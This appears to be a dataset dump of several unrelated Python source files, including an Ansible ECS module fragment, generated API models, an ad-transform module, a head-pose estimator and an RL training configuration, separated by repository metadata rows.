results['ansible_facts'] = existing
if 'status' in existing and existing['status'] == "INACTIVE":
results['changed'] = False
else:
if not module.check_mode:
try:
service_mgr.delete_service(
module.params['name'],
module.params['cluster']
)
except botocore.exceptions.ClientError as e:
module.fail_json_aws(e, msg="Couldn't delete service")
results['changed'] = True
elif module.params['state'] == 'deleting':
if not existing:
module.fail_json(msg="Service '" + module.params['name'] + " not found.")
return
# it exists, so we should delete it and mark changed.
# return info about the cluster deleted
delay = module.params['delay']
repeat = module.params['repeat']
time.sleep(delay)
for i in range(repeat):
existing = service_mgr.describe_service(module.params['cluster'], module.params['name'])
status = existing['status']
if status == "INACTIVE":
results['changed'] = True
break
time.sleep(delay)
if i is repeat - 1:
module.fail_json(msg="Service still not deleted after " + str(repeat) + " tries of " + str(delay) + " seconds each.")
return
module.exit_json(**results)
if __name__ == '__main__':
main()
| 41.839138
| 160
| 0.591621
|
594bf296f8bd0ad02b42744230d34ed9fffd7891
| 2,792
|
py
|
Python
|
midgard_client/midgard_client/models/proxied_nodes.py
|
hoodieonwho/thorchain-python-client
|
fccfd66552e16bdab1dbb90b68022475c7a9693d
|
[
"MIT"
] | null | null | null |
midgard_client/midgard_client/models/proxied_nodes.py
|
hoodieonwho/thorchain-python-client
|
fccfd66552e16bdab1dbb90b68022475c7a9693d
|
[
"MIT"
] | null | null | null |
midgard_client/midgard_client/models/proxied_nodes.py
|
hoodieonwho/thorchain-python-client
|
fccfd66552e16bdab1dbb90b68022475c7a9693d
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Midgard Public API
The Midgard Public API queries THORChain and any chains linked via the Bifröst and prepares information about the network to be readily available for public users. The API parses transaction event data from THORChain and stores them in a time-series database to make time-dependent queries easy. Midgard does not hold critical information. To interact with BEPSwap and Asgardex, users should query THORChain directly. # noqa: E501
OpenAPI spec version: 2.5.12
Contact: devs@thorchain.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ProxiedNodes(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
}
attribute_map = {
}
def __init__(self): # noqa: E501
"""ProxiedNodes - a model defined in Swagger""" # noqa: E501
self.discriminator = None
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ProxiedNodes, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ProxiedNodes):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 32.847059
| 435
| 0.588467
|
5199563be34d9be59e92d990cf041f820a3b4e9f
| 5,141
|
py
|
Python
|
app/adzerk/transform.py
|
Pocket/proxy-server
|
f7a6d668224dd2b93d0b9b0c41c91744c5b042d3
|
[
"Apache-2.0"
] | 13
|
2019-11-04T23:55:18.000Z
|
2021-11-26T07:07:46.000Z
|
app/adzerk/transform.py
|
Pocket/proxy-server
|
f7a6d668224dd2b93d0b9b0c41c91744c5b042d3
|
[
"Apache-2.0"
] | 12
|
2020-02-02T10:54:21.000Z
|
2021-06-10T16:12:55.000Z
|
app/adzerk/transform.py
|
Pocket/proxy-server
|
f7a6d668224dd2b93d0b9b0c41c91744c5b042d3
|
[
"Apache-2.0"
] | 2
|
2020-01-15T07:38:24.000Z
|
2022-01-19T19:55:59.000Z
|
from urllib import parse
import json
import re
import logging
import distutils.util
from app import conf
DEFAULT_PRIORITY = 100
def to_spoc(decision):
if not decision:
return {}
custom_data = decision['contents'][0]['data']
body = decision['contents'][0].get('body')
if body:
body = json.loads(body)
events_map = {e["id"]: tracking_url_to_shim(e["url"]) for e in decision["events"]}
priority_map = conf.adzerk['priority_id_to_weight']
spoc = {
'id': decision['adId'],
'flight_id': decision['flightId'],
'campaign_id': decision['campaignId'],
'title': custom_data['ctTitle'],
'url': custom_data['ctUrl'],
'domain': custom_data['ctDomain'],
'excerpt': custom_data['ctExcerpt'],
'priority': priority_map.get(decision.get('priorityId'), DEFAULT_PRIORITY),
'context': __get_context(custom_data.get('ctSponsor')),
'raw_image_src': custom_data['ctFullimagepath'],
'image_src': __get_cdn_image(custom_data['ctFullimagepath']),
'shim': {
'click': tracking_url_to_shim(decision['clickUrl']),
'impression': tracking_url_to_shim(decision['impressionUrl']),
'delete': events_map[17],
'save': events_map[20],
},
'parameter_set': 'default',
'caps': conf.spocs['caps'],
'domain_affinities': __get_domain_affinities(custom_data.get('ctDomain_affinities')),
'personalization_models': get_personalization_models(body),
}
optional_fields = {
'ctCta': 'cta',
'ctCollectionTitle': 'collection_title',
'ctSponsor': 'sponsor',
'ctSponsoredByOverride': 'sponsored_by_override',
}
for adzerk_key, spoc_key in optional_fields.items():
if adzerk_key in custom_data and custom_data[adzerk_key]:
spoc[spoc_key] = custom_data[adzerk_key]
if 'sponsored_by_override' in spoc:
spoc['sponsored_by_override'] = __clean_sponsored_by_override(spoc['sponsored_by_override'])
spoc['min_score'] = float(custom_data.get('ctMin_score', 0.1))
spoc['item_score'] = float(custom_data.get('ctItem_score', 0.2))
try:
spoc['is_video'] = bool(distutils.util.strtobool(custom_data['ctIsVideo'].strip()))
except (KeyError, ValueError):
# Don't set is_video if ctIsVideo is not present or not a boolean (e.g. an empty string)
pass
return spoc
def tracking_url_to_shim(url):
components = parse.urlsplit(url)
path_id = conf.adzerk['telemetry_endpoint_ids'].get(components.path)
if path_id is None:
raise Exception('Not a known telemetry path: {0}'.format(components.path))
params = parse.parse_qs(components.query)
e = params['e'][0]
s = params['s'][0]
return ','.join([path_id,e,s])
def is_collection(spocs):
"""
:param spocs: A list of spocs
:return: True if the list of spocs is a sponsored collection; spocs that should be featured together.
"""
return all(spoc.get('collection_title') for spoc in spocs)
def to_collection(spocs):
"""
Transforms a list of spocs to a sponsored collection dictionary.
AdZerk does not support fields for a collection. We set them on all creatives and get them from an arbitrary one.
:param spocs: A list of spocs
:return: A dictionary with collection fields (title, flight_id, and sponsor) and a list of spocs.
"""
collection = {
'title': spocs[0]['collection_title'],
'flight_id': spocs[0]['flight_id'],
'sponsor': spocs[0]['sponsor'],
'context': __get_context(spocs[0]['sponsor']),
}
for spoc in spocs:
del spoc['collection_title']
collection['items'] = spocs
return collection
def get_personalization_models(body):
if body is None:
return {}
else:
# Topics in AdZerk prefixed with topic_ correspond with models in Firefox prefixed with nb_model_.
p = re.compile('^topic_')
return {k: 1 for k in [p.sub('', t) for t, v in body.items() if p.match(t) and v in ('true', True)]}
def __get_cdn_image(raw_image_url):
escaped = parse.quote(raw_image_url)
return 'https://img-getpocket.cdn.mozilla.net/direct?url={0}&resize=w618-h310'.format(escaped)
def __get_context(sponsor):
return 'Sponsored by {0}'.format(sponsor) if sponsor else ''
def __get_domain_affinities(name):
if name is None:
return {}
else:
return conf.domain_affinities.get(str(name).lower(), dict())
def __clean_sponsored_by_override(sponsored_by_override):
"""
Return an empty string for 'sponsored_by_override' if the value in AdZerk is set to "blank" or "empty".
@type sponsored_by_override: str
"""
return re.sub(r'^(blank|empty)$', '', sponsored_by_override.strip(), flags=re.IGNORECASE)
| 35.455172
| 117
| 0.62128
|
601524e09cd842e8d86ec4c8fd6005d74e3c94bd
| 354
|
py
|
Python
|
mir/feature/tonal/__init__.py
|
ansvver/pylufia
|
0076b4baef1de5371476910c12c1829d694fa2f3
|
[
"MIT"
] | null | null | null |
mir/feature/tonal/__init__.py
|
ansvver/pylufia
|
0076b4baef1de5371476910c12c1829d694fa2f3
|
[
"MIT"
] | null | null | null |
mir/feature/tonal/__init__.py
|
ansvver/pylufia
|
0076b4baef1de5371476910c12c1829d694fa2f3
|
[
"MIT"
] | 1
|
2021-04-08T03:15:08.000Z
|
2021-04-08T03:15:08.000Z
|
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# @file: feature
# @brief:
#
# @author: sasai
# @date: 25/04/2012
# @copyright: (c) sasai 2012
# @license: <your licence>
#
# Description:
#
#-------------------------------------------------------------------------------
from chroma import *
| 20.823529
| 80
| 0.319209
|
e8b00ae5d97685c2d5927e7d22497b77ea971e0c
| 3,325
|
py
|
Python
|
Assignment24/lips and eyes filter + scaling mouth/SolvePnPHeadPoseEstimation.py
|
BenyaminZojaji/image_processing
|
0cfe3a6b826b25fcdd0de5041916aed423bfdb37
|
[
"MIT"
] | 21
|
2021-11-05T20:24:58.000Z
|
2022-02-05T07:49:28.000Z
|
Assignment24/lips and eyes filter/SolvePnPHeadPoseEstimation.py
|
BenyaminZojaji/image_processing
|
0cfe3a6b826b25fcdd0de5041916aed423bfdb37
|
[
"MIT"
] | null | null | null |
Assignment24/lips and eyes filter/SolvePnPHeadPoseEstimation.py
|
BenyaminZojaji/image_processing
|
0cfe3a6b826b25fcdd0de5041916aed423bfdb37
|
[
"MIT"
] | 2
|
2021-12-28T02:12:22.000Z
|
2022-02-09T12:39:54.000Z
|
import cv2
import numpy as np
import sys
class HeadPoseEstimator:
def __init__(self, filepath, W, H) -> None:
# camera matrix
matrix = np.array([[W, 0, W/2.0],
[0, W, H/2.0],
[0, 0, 1]])
# load pre-defined 3d object points and mapping indexes
obj, index = np.load(filepath, allow_pickle=True)
obj = obj.T
def solve_pnp_wrapper(obj, index, matrix):
def solve_pnp(shape):
return cv2.solvePnP(obj, shape[index], matrix, None)
return solve_pnp
self._solve_pnp = solve_pnp_wrapper(obj, index, matrix)
def get_head_pose(self, shape):
if len(shape) != 106:
raise RuntimeError('Unsupported shape format')
_, rotation_vec, translation_vec = self._solve_pnp(shape)
rotation_mat = cv2.Rodrigues(rotation_vec)[0]
pose_mat = cv2.hconcat((rotation_mat, translation_vec))
euler_angle = cv2.decomposeProjectionMatrix(pose_mat)[-1]
return euler_angle
@staticmethod
def draw_axis(img, euler_angle, center, size=80, thickness=3,
angle_const=np.pi/180, copy=False):
if copy:
img = img.copy()
euler_angle *= angle_const
sin_pitch, sin_yaw, sin_roll = np.sin(euler_angle)
cos_pitch, cos_yaw, cos_roll = np.cos(euler_angle)
axis = np.array([
[cos_yaw * cos_roll,
cos_pitch * sin_roll + cos_roll * sin_pitch * sin_yaw],
[-cos_yaw * sin_roll,
cos_pitch * cos_roll - sin_pitch * sin_yaw * sin_roll],
[sin_yaw,
-cos_yaw * sin_pitch]
])
axis *= size
axis += center
axis = axis.astype(np.int)
tp_center = tuple(center.astype(np.int))
cv2.line(img, tp_center, tuple(axis[0]), (0, 0, 255), thickness)
cv2.line(img, tp_center, tuple(axis[1]), (0, 255, 0), thickness)
cv2.line(img, tp_center, tuple(axis[2]), (255, 0, 0), thickness)
return img
def main(filename):
from TFLiteFaceDetector import UltraLightFaceDetecion
from TFLiteFaceAlignment import CoordinateAlignmentModel
cap = cv2.VideoCapture(filename)
fd = UltraLightFaceDetecion("weights/RFB-320.tflite",
conf_threshold=0.95)
fa = CoordinateAlignmentModel("weights/coor_2d106.tflite")
hp = HeadPoseEstimator("weights/head_pose_object_points.npy",
cap.get(3), cap.get(4))
color = (125, 255, 125)
while True:
ret, frame = cap.read()
if not ret:
break
bboxes, _ = fd.inference(frame)
for pred in fa.get_landmarks(frame, bboxes):
for p in np.round(pred).astype(np.int):
cv2.circle(frame, tuple(p), 1, color, 1, cv2.LINE_AA)
face_center = np.mean(pred, axis=0)
euler_angle = hp.get_head_pose(pred).flatten()
print(*euler_angle)
hp.draw_axis(frame, euler_angle, face_center)
cv2.imshow("result", frame)
if cv2.waitKey(0) == ord('q'):
break
if __name__ == '__main__':
main(sys.argv[1])
| 31.074766
| 73
| 0.563308
|
591e3014f83f2cd6c4593834030cfd395f8e4707
| 18,808
|
py
|
Python
|
scripts/uncertainty_scripts/train_all_diffobj.py
|
neuroailab/curiosity_deprecated
|
65f7cde13b07cdac52eed39535a94e7544c396b8
|
[
"Apache-2.0"
] | null | null | null |
scripts/uncertainty_scripts/train_all_diffobj.py
|
neuroailab/curiosity_deprecated
|
65f7cde13b07cdac52eed39535a94e7544c396b8
|
[
"Apache-2.0"
] | 2
|
2017-11-18T00:53:33.000Z
|
2017-11-18T00:53:40.000Z
|
scripts/uncertainty_scripts/train_all_diffobj.py
|
neuroailab/curiosity_deprecated
|
65f7cde13b07cdac52eed39535a94e7544c396b8
|
[
"Apache-2.0"
] | null | null | null |
'''
Random actions, after index mismatch bug.
'''
import sys
sys.path.append('/home/nhaber/projects/curiosity')
sys.path.append('/home/nhaber/projects/tfutils')
import tensorflow as tf
from curiosity.interaction import train, environment, data, static_data, cfg_generation, update_step, mode_switching
import curiosity.interaction.models as models
from tfutils import base, optimizer
import numpy as np
import os
import argparse
import copy
parser = argparse.ArgumentParser()
parser.add_argument('-g', '--gpu', default = '0', type = str)
parser.add_argument('-wmea', '--wmencarchitecture', default = 2, type = int)
parser.add_argument('-wmfca', '--wmfcarchitecture', default = 4, type = int)
parser.add_argument('-wmmbca', '--wmmbcarchitecture', default = -1, type = int)
parser.add_argument('-umea', '--umencarchitecture', default = 0, type = int)
parser.add_argument('-umfca', '--umfcarchitecture', default = 2, type = int)
parser.add_argument('-ummbaa', '--ummbaarchitecture', default = 1, type = int)
parser.add_argument('--umlr', default = 1e-3, type = float)
parser.add_argument('--actlr', default = 1e-4, type = float)
#parser.add_argument('--loss', default = 0, type = int)
parser.add_argument('--tiedencoding', default = False, type = bool)
parser.add_argument('--heat', default = 1., type = float)
parser.add_argument('--egoonly', default = False, type = bool)
parser.add_argument('--zeroedforce', default = False, type = bool)
parser.add_argument('--optimizer', default = 'adam', type = str)
parser.add_argument('--batching', default = 'uniform', type = str)
parser.add_argument('--batchsize', default = 32, type = int)
parser.add_argument('--numperbatch', default = 8, type = int)
parser.add_argument('--historylen', default = 1000, type = int)
parser.add_argument('--ratio', default = 2 / .17, type = float)
parser.add_argument('--objsize', default = .4, type = float)
parser.add_argument('--lossfac', default = 1., type = float)
parser.add_argument('--nclasses', default = 4, type = int)
#parser.add_argument('--t1', default = .05, type = float)
#parser.add_argument('--t2', default = .3, type = float)
#parser.add_argument('--t3', default = .6, type = float)
parser.add_argument('-at', '--actionthreshold', default = .1, type = float)
parser.add_argument('-ut', '--uncertaintythreshold', default = .1, type = float)
parser.add_argument('--modelseed', default = 0, type = int)
parser.add_argument('--gather', default = 48, type = int)
parser.add_argument('--testmode', default = False, type = bool)
parser.add_argument('-ds', '--dataseed', default = 0, type = int)
parser.add_argument('-nenv', '--numberofenvironments', default=4, type = int)
parser.add_argument('--loadstep', default = -1, type = int)
parser.add_argument('--rendernode', default = 'render1', type = str)
parser.add_argument('--objseed', default = 1, type = int)
N_ACTION_SAMPLES = 1000
EXP_ID_PREFIX = 'do'
NUM_BATCHES_PER_EPOCH = 1e8
IMAGE_SCALE = (128, 170)
ACTION_DIM = 5
NUM_TIMESTEPS = 3
T_PER_STATE = 2
args = vars(parser.parse_args())
obj_seed = args['objseed']
render_node = args['rendernode']
RENDER1_HOST_ADDRESS = cfg_generation.get_ip(render_node)
STATE_STEPS = [-1, 0]
STATES_GIVEN = [-2, -1, 0, 1]
ACTIONS_GIVEN = [-2, -1, 1]
OBJTHERE_TEST_METADATA_LOC = '/media/data4/nhaber/one_room_dataset/diffobj' + str(args['objseed']) + '_meta.pkl'
s_back = - (min(STATES_GIVEN) + min(STATE_STEPS))
s_forward = max(STATES_GIVEN) + max(STATE_STEPS)
a_back = - min(ACTIONS_GIVEN)
a_forward = max(ACTIONS_GIVEN)
def online_agg_func(agg_res, res, step):
if agg_res is None:
agg_res = {k : [] for k in res}
for k, v in res.items():
agg_res[k].append(v)
return agg_res
def agg_func(res):
return res
test_mode = args['testmode']
act_thresholds = [-args['actionthreshold'], args['actionthreshold']]
n_classes_wm = len(act_thresholds) + 1
um_thresholds = [args['uncertaintythreshold']]
n_classes_um = len(um_thresholds) + 1
batch_size = args['batchsize']
wm_encoding_choices = [
{
'sizes' : [3, 3, 3, 3],
'strides' : [2, 2, 2, 2],
'num_filters' : [32, 32, 32, 32],
'bypass' : [None, None, None, None]
},
{
'sizes' : [7, 3, 3, 3],
'strides' : [3, 2, 2, 2],
'num_filters' : [32, 32, 32, 32],
'bypass' : [0, 0, 0, 0]
},
{
'sizes' : [7, 3, 3, 3, 3],
'strides' : [3, 2, 2, 2, 2],
'num_filters' : [32, 32, 32, 32, 32],
'bypass' : [0, 0, 0, 0, 0]
},
{
'sizes' : [7, 3, 3, 3, 3],
'strides' : [2, 2, 1, 1, 1],
'num_filters' : [4, 4, 4, 4, 4],
'bypass' : [0, 0, 0, 0, 0]
}
]
wm_mlp_before_concat_choices = [
{
'num_features' : [500, 10],
'nonlinearities' : ['relu', 'relu']
},
{
'num_features' : [500, 50],
'nonlinearities' : ['relu', 'relu']
}
]
wm_mlp_choices = [
{
'num_features' : [256, ACTION_DIM * n_classes_wm],
'nonlinearities' : ['relu', 'identity'],
'dropout' : [None, None]
},
{
'num_features' : [50, 50, ACTION_DIM * n_classes_wm],
'nonlinearities' : ['relu', 'relu', 'identity'],
'dropout' : [None, None, None]
},
{
'num_features' : [50, 50, ACTION_DIM * n_classes_wm],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu'], 'identity'],
'dropout' : [None, None, None]
},
{
'num_features' : [100, 100, 100, ACTION_DIM * n_classes_wm],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu'], ['crelu', 'square_crelu'], 'identity'],
'dropout' : [None, None, None, None]
},
{
'num_features' : [500, 500, ACTION_DIM * n_classes_wm],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu'], 'identity'],
'dropout' : [None, None, None]
},
{
'num_features' : [1000, 1000, 500, ACTION_DIM * n_classes_wm],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu'], ['crelu', 'square_crelu'], 'identity'],
'dropout' : [None, None, None, None]
}
]
wm_encoding_choice = wm_encoding_choices[args['wmencarchitecture']]
wm_mlp_choice = wm_mlp_choices[args['wmfcarchitecture']]
wm_cfg = {
'num_timesteps' : NUM_TIMESTEPS,
'state_steps' : [-1, 0],
'image_shape' : list(IMAGE_SCALE) + [3],
'states_given' : [-2, -1, 0, 1],
'actions_given' : [-2, -1, 1],
'act_dim' : ACTION_DIM,
'encode' : cfg_generation.generate_conv_architecture_cfg(**wm_encoding_choice),
'action_model' : {
'loss_func' : models.binned_softmax_loss_per_example,
'thresholds' : act_thresholds,
'loss_factor' : 1.,
'mlp' : cfg_generation.generate_mlp_architecture_cfg(**wm_mlp_choice)
},
'norepeat' : True
}
mbc_idx = args['wmmbcarchitecture']
if mbc_idx != -1:
wm_mbc_choice = wm_mlp_before_concat_choices[mbc_idx]
wm_cfg['action_model']['mlp_before_concat'] = cfg_generation.generate_mlp_architecture_cfg(**wm_mbc_choice)
um_encoding_choices = [
{
'sizes' : [7, 3, 3, 3],
'strides' : [3, 2, 2, 2],
'num_filters' : [32, 32, 32, 32],
'bypass' : [0, 0, 0, 0]
},
{
'sizes' : [7, 3],
'strides' : [3, 2],
'num_filters' : [16, 2],
'bypass' : [0, 0]
},
{
'sizes' : [7, 3, 3, 3, 3],
'strides' : [3, 2, 2, 2, 2],
'num_filters' : [32, 32, 32, 32, 32],
'bypass' : [0, 0, 0, 0, 0]
}
]
shared_mlp_choices = [
{
'num_features' : [100, 100],
'nonlinearities' : ['relu', 'relu'],
'dropout' : [None, None]
},
{
'num_features' : [50, 50],
'nonlinearities' : ['relu', 'relu'],
'dropout' : [None, None]
},
{
'num_features' : [500],
'nonlinearities' : ['relu'],
'dropout' : [None]
},
{
'num_features' : [50, 50],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu']],
'dropout' : [None, None]
}
]
separate_mlp_choices_proto = {
'num_features' : [n_classes_um],
'nonlinearities' : ['identity'],
'dropout' : [None]
}
separate_mlp_choice = dict((t, separate_mlp_choices_proto) for t in range(NUM_TIMESTEPS))
mlp_before_action_choices = [
{
'num_features' : [500, 10],
'nonlinearities' : ['relu', 'relu']
},
{
'num_features' : [500, 50],
'nonlinearities' : ['relu', 'relu']
},
{
'num_features' : [300, 100],
'nonlinearities' : ['relu', 'relu']
}
]
um_encoding_args = um_encoding_choices[args['umencarchitecture']]
um_mlp_before_act_args = mlp_before_action_choices[args['ummbaarchitecture']]
um_mlp_args = shared_mlp_choices[args['umfcarchitecture']]
um_cfg = {
'shared_encode' : cfg_generation.generate_conv_architecture_cfg(desc = 'encode', **um_encoding_args),
'shared_mlp_before_action' : cfg_generation.generate_mlp_architecture_cfg(**um_mlp_before_act_args),
'shared_mlp' : cfg_generation.generate_mlp_architecture_cfg(**um_mlp_args),
'mlp' : dict((t, cfg_generation.generate_mlp_architecture_cfg(**choice_args)) for t, choice_args in separate_mlp_choice.iteritems()),
'loss_func' : models.ms_sum_binned_softmax_loss,
'thresholds' : um_thresholds,
'loss_factor' : args['lossfac'],
'n_action_samples' : N_ACTION_SAMPLES,
'heat' : args['heat'],
}
model_cfg = {
'world_model' : wm_cfg,
'uncertainty_model' : um_cfg,
'seed' : args['modelseed']
}
lr_params = {
'world_model' : {
'act_model' : {
'func': tf.train.exponential_decay,
'learning_rate': args['actlr'],
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
},
'fut_model' : {
'func': tf.train.exponential_decay,
'learning_rate': args['actlr'],
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
}
},
'uncertainty_model' : {
'func': tf.train.exponential_decay,
'learning_rate': args['umlr'],
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
}
}
if args['optimizer'] == 'adam':
optimizer_class = tf.train.AdamOptimizer
optimizer_params = {
'world_model' : {
'act_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
},
'fut_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
}
},
'uncertainty_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
}
}
elif args['optimizer'] == 'momentum':
optimizer_class = tf.train.MomentumOptimizer
optimizer_params = {
'world_model' : {
'act_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
'momentum' : .9
},
'fut_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
'momentum' : .9
}
},
'uncertainty_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
'momentum' : .9
}
}
def get_static_data_provider(data_params, model_params, action_model):
data_params_copy = copy.copy(data_params)
data_params_copy.pop('func')
return static_data.OfflineDataProvider(**data_params_copy)
train_params = {
'updater_func' : update_step.FreezeUpdater,
'updater_kwargs' : {
'state_desc' : 'depths1',
'freeze_wm' : False,
'freeze_um' : False,
'map_draw_mode' : 'specified_indices',
'map_draw_example_indices' : [0, batch_size - 1],
'map_draw_timestep_indices' : [1, 2],
'map_draw_freq' : 10 if test_mode else 1000
},
#'post_init_transform' : mode_switching.panic_reinit
}
def get_ms_models(cfg):
world_model = models.MoreInfoActionWorldModel(cfg['world_model'])
uncertainty_model = models.MSExpectedUncertaintyModel(cfg['uncertainty_model'], world_model)
return {'world_model' : world_model, 'uncertainty_model' : uncertainty_model}
model_params = {
'func' : get_ms_models,
'cfg' : model_cfg,
'action_model_desc' : 'uncertainty_model'
}
one_obj_scene_info = [
{
'type' : 'SHAPENET',
'scale' : args['objsize'],
'mass' : 1.,
'scale_var' : .01,
'num_items' : 1,
}
]
force_scaling = 200.
room_dims = (5, 5)
my_rng = np.random.RandomState(0)
history_len = args['historylen']
if test_mode:
history_len = 50
batch_size = args['batchsize']
data_lengths = {
'obs' : {'depths1' : s_back + s_forward + NUM_TIMESTEPS},
'action' : a_back + a_forward + NUM_TIMESTEPS,
'action_post' : a_back + a_forward + NUM_TIMESTEPS}
n_env = args['numberofenvironments']
dp_config = {
'func' : train.get_batching_data_provider,
'n_environments': n_env,
'action_limits' : np.array([1., 1.] + [force_scaling for _ in range(ACTION_DIM - 2)]),
'environment_params' : {
'random_seed' : obj_seed,
'unity_seed' : 1,
'room_dims' : room_dims,
'state_memory_len' : {
'depths1' : history_len + s_back + s_forward + NUM_TIMESTEPS
},
'action_memory_len' : history_len + a_back + a_forward + NUM_TIMESTEPS,
'message_memory_len' : history_len + a_back + a_forward + NUM_TIMESTEPS,
'other_data_memory_length' : 32,
'rescale_dict' : {
'depths1' : IMAGE_SCALE
},
'USE_TDW' : True,
'host_address' : RENDER1_HOST_ADDRESS,
'rng_periodicity' : 1,
'termination_condition' : environment.obj_not_present_termination_condition,
'selected_build' : 'three_world_locked_rot.x86_64'
},
'provider_params' : {
'batching_fn' : lambda hist : data.uniform_experience_replay(hist, history_len, my_rng = my_rng, batch_size = batch_size / n_env,
get_object_there_binary = False, data_lengths = data_lengths, which_matters_for_freq = -2),
'capacity' : 5,
'gather_per_batch' : args['gather'] / n_env,
'gather_at_beginning' : history_len + T_PER_STATE + NUM_TIMESTEPS
},
'scene_list' : [one_obj_scene_info],
'scene_lengths' : [1024 * 32],
'do_torque' : False,
'use_absolute_coordinates' : False
}
validate_params = {
'valid0': {
'func' : update_step.ActionUncertaintyValidatorWithReadouts,
'kwargs' : {},
'num_steps' : 500,
'online_agg_func' : online_agg_func,
'agg_func' : agg_func,
'data_params' : {
'func' : get_static_data_provider,
'batch_size' : args['batchsize'],
'batcher_constructor' : static_data.ObjectThereFixedPermutationBatcher,
'data_lengths' : data_lengths,
'capacity' : 5,
'metadata_filename' : OBJTHERE_TEST_METADATA_LOC,
'batcher_kwargs' : {
'seed' : 0,
'num_there_per_batch' : 16,
'num_not_there_per_batch' : 16,
'reset_batch_num' : 500
}
}
}
}
load_and_save_params = cfg_generation.query_gen_latent_save_params(location = 'freud', prefix = EXP_ID_PREFIX, state_desc = 'depths1', portnum = cfg_generation.NODE_5_PORT)
load_and_save_params['save_params']['save_to_gfs'] = ['batch', 'msg', 'recent', 'map_draw']
load_and_save_params['what_to_save_params']['big_save_keys'].extend(['um_loss1', 'um_loss2', 'um_loss0'])
load_and_save_params['what_to_save_params']['little_save_keys'].extend(['um_loss1', 'um_loss2', 'um_loss0'])
load_and_save_params['save_params']['save_metrics_freq'] = 20 if test_mode else 1000
postprocessor_params = {
'func' : train.get_experience_replay_postprocessor
}
params = {
'model_params' : model_params,
'data_params' : dp_config,
'postprocessor_params' : postprocessor_params,
'optimizer_params' : optimizer_params,
'learning_rate_params' : lr_params,
'train_params' : train_params,
'validate_params' : validate_params
}
params.update(load_and_save_params)
params['save_params']['save_valid_freq'] = 5 if test_mode else 10000
params['allow_growth'] = True
if __name__ == '__main__':
os.environ['CUDA_VISIBLE_DEVICES'] = args['gpu']
train.train_from_params(**params)
| 31.504188
| 172
| 0.552797
|
cf39867c5c57b98a5366e87677fdea97a7841664
| 15,314
|
py
|
Python
|
sdk/python/pulumi_azure_native/securityinsights/v20210301preview/aws_cloud_trail_data_connector.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/securityinsights/v20210301preview/aws_cloud_trail_data_connector.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/securityinsights/v20210301preview/aws_cloud_trail_data_connector.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['AwsCloudTrailDataConnectorArgs', 'AwsCloudTrailDataConnector']
@pulumi.input_type
class AwsCloudTrailDataConnectorArgs:
def __init__(__self__, *,
data_types: pulumi.Input['AwsCloudTrailDataConnectorDataTypesArgs'],
kind: pulumi.Input[str],
operational_insights_resource_provider: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
workspace_name: pulumi.Input[str],
aws_role_arn: Optional[pulumi.Input[str]] = None,
data_connector_id: Optional[pulumi.Input[str]] = None,
etag: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a AwsCloudTrailDataConnector resource.
:param pulumi.Input['AwsCloudTrailDataConnectorDataTypesArgs'] data_types: The available data types for the connector.
:param pulumi.Input[str] kind: The kind of the data connector
Expected value is 'AmazonWebServicesCloudTrail'.
:param pulumi.Input[str] operational_insights_resource_provider: The namespace of workspaces resource provider- Microsoft.OperationalInsights.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] workspace_name: The name of the workspace.
